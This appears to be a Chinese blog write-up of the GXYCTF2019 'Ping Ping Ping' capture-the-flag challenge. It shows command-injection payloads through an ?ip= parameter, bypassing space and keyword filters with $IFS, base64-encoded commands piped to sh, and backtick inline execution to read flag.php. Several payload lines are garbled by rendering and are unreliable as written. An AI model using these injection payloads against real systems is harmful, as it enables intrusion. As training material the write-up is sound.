[GXYCTF2019]Ping Ping Ping

本文详细解析了GXYCTF2019中PingPingPing题目的解题过程,从初步尝试到利用命令执行漏洞,最终通过构造payload绕过过滤,成功获取flag。涉及远程命令执行、空格过滤、base64编码等关键概念。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[GXYCTF2019]Ping Ping Ping

题目:

引入眼帘的是一片空白,只有/?id=
在这里插入图片描述
看到/?ip=、随便构造一个payload
在这里插入图片描述

分析:

考点是远程命令执行?继续尝试改造payload
在这里插入图片描述
老老实实走常规路线,查看目录文件,找到flag.php
在这里插入图片描述
无法直接cat flag.php
在这里插入图片描述

解题:

考绕过的知识点?

命令执行漏洞利用及绕过方式总结

  • 空格过滤

paload ==> ?ip=1;cat$IFS$1index.php
在这里插入图片描述
成功访问、给了提示、bash、flag、和一些字符被过滤掉了 ==> 用sh和其他编码试试(bash的软链接)

  • base64 编码
    在这里插入图片描述
    payload ==> ?ip=1;echo%20%22Y2F0IGZsYWcucGhw%22|base64%20-d|sh
    在这里插入图片描述
    应该是要结合一下$IFS$1空格过滤

payload => ?ip=1;echo$IFS 1 Y 2 F 0 I G Z s Y W c u c G h w ∣ b a s e 64 1Y2F0IGZsYWcucGhw|base64 1Y2F0IGZsYWcucGhwbase64IFS$1-d|sh

payload => ?ip=1;echo$IFS 1 “ Y 2 F 0 I G Z s Y W c u c G h w ” ∣ b a s e 64 1“Y2F0IGZsYWcucGhw”|base64 1Y2F0IGZsYWcucGhwbase64IFS$1-d|sh
在这里插入图片描述

难道是cat flag.php改成catflagphp ???

payload => ?ip=1;echo$IFS 1 Y 2 F 0 Z m x h Z y 5 w a H A = ∣ b a s e 64 1Y2F0ZmxhZy5waHA=|base64 1Y2F0ZmxhZy5waHA=base64IFS$1-d|sh
在这里插入图片描述

这不科学

  • 内敛执行

payload ==> ?ip=1;cat$IFS$1ls
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值